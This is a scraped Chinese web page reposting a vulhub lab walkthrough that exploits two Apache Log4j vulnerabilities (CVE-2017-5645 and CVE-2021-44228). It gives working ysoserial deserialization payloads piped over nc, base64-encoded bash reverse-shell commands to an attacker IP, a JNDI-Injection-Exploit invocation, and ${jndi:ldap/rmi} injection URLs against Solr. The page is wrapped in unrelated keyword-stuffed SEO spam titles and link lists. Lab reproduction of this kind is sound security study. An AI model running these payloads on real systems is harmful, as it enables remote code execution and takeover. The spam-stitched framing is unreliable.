当前位置: 首页 > news >正文

中国站长之家域名查询百度地图的精准定位功能

中国站长之家域名查询,百度地图的精准定位功能,石家庄住房与城乡建设官网,网站建设刂搜金手指下拉二五一.Log4j反序列化命令执行漏洞(CVE-2017-5645) Apache Log4j是一个用于Java的日志记录库,其支持启动远程日志服务器。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻击者可利用该漏洞执行任意代码 环境:vulhub 工具下载地址&#xff1…

一.Log4j反序列化命令执行漏洞(CVE-2017-5645)

Apache Log4j是一个用于Java的日志记录库,其支持启动远程日志服务器。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻击者可利用该漏洞执行任意代码

环境:vulhub
工具下载地址:
ysoserial

利用工具生成payload:

#创建文件
java -jar ysoserial-all.jar CommonsCollections5 "touch /tmp/test" | nc 192.168.85.128 4712#反弹shell
#把 bash -i >& /dev/tcp/192.168.85.129/4466 0>&1进行base64编码
java -jar ysoserial-all.jar CommonsCollections5 "bash -c {echo,IGJhc2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC44NS4xMjkvNDQ2NiAwPiYx}|{base64,-d}|{bash,-i}" | nc 192.168.85.128 4712

1.创建文件 进入容器内部,查看文件创建成功

docker ps
docker exec -it 19bdcb0184e1 /bin/bash
cd /tmp 
ls

2.查看反弹的shell
有点问题没反弹成功,应该是这样做的

nc -lvvp 4466

​二.Apache Log4j2 lookup JNDI 注入漏洞(CVE-2021-44228)

Apache Log4j 2 是Java语言的日志处理套件,使用极为广泛。在其2.0到2.14.1版本中存在一处JNDI注入漏洞,攻击者在可以控制日志内容的情况下,通过传入类似于${jndi:ldap://evil.com/example}的lookup用于进行JNDI注入,执行任意代码

环境:vulhub
工具下载地址:
JNDI-Injection-Exploit
1.利用dnslog平台检测是否有漏洞

后面换成dnslong平台的域名
http://192.168.85.128:8983/solr/admin/cores?action=${jndi:ldap://yahs0y.dnslog.cn}

在这里插入图片描述
2.利用工具反弹shell
(1)使用工具生成payload

1.把bash -i >& /dev/tcp/192.168.85.129/4444 0>&1进行base64编码 填入echo后,-A参数后填入攻击机的ip
2.利用JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljg1LjEyOS80NDQ0IDA+JjE=}|{base64,-d}|{bash,-i}" -A 192.168.85.129

(2)选用一个作为url action后的payload,访问此url
这里选用第一个,下面的url访问

http://192.168.85.128:8983/solr/admin/cores?action=${jndi:rmi://192.168.85.129:1099/itx5mr}

(3)攻击机开启监听

nc -lvvp 4444

在这里插入图片描述

参考文章:
CVE-2021-44228

http://www.mmbaike.com/news/110482.html

相关文章:

  • 网站用什么框架做重庆网站建设技术外包
  • 天门市电子商务网站建设网络营销的10个特点
  • 网站开发可选的方案有市场营销策略有哪些
  • 网站模版制作关键词推广系统
  • 平台搭建是什么搜索引擎优化排名品牌
  • 筹建网站信息技术2022年最好用的搜索引擎
  • 新版wordpress头像石家庄百度快照优化
  • 嘉兴网站建设seo百度搜题网页版入口
  • 电脑传奇游戏哪个好玩seo查询是什么意思
  • 网站制作中企动力福建百度代理公司
  • 网站推广方法的费用廊坊seo推广
  • 网站开发时什么时间适合创建视图搜索引擎优化解释
  • 免费网站统计合肥建站公司seo
  • 北京seo邢云涛优化网站排名技巧
  • 良匠网站建设招商外包
  • 网站系统测试方法提升关键词
  • 知名企业文化案例宁波如何做抖音seo搜索优化
  • 怎么利用网站做淘宝客邀请注册推广赚钱的app
  • 怎么做快三一模一样的网站类似58的推广平台有哪些平台
  • 做网站老板不发工资我拿尾款微信营销的特点
  • 哪些网站可以做问卷外贸网络营销
  • 做网站推广优化靠谱郭生b如何优化网站
  • 深圳网站建设 设计首选网络营销理论包括哪些
  • wordpress+4.5+多站点百度seo
  • 微商推广哪家好百度关键词优化词精灵
  • 自己做一个网站全球搜索网站排名
  • 重庆忠县网站建设公司哪家专业站长工具查询域名
  • vs2010做的网站百度贴吧怎么做推广
  • html5快速建站百度一下百度知道
  • 知名响应式网站企业慧聪网seo页面优化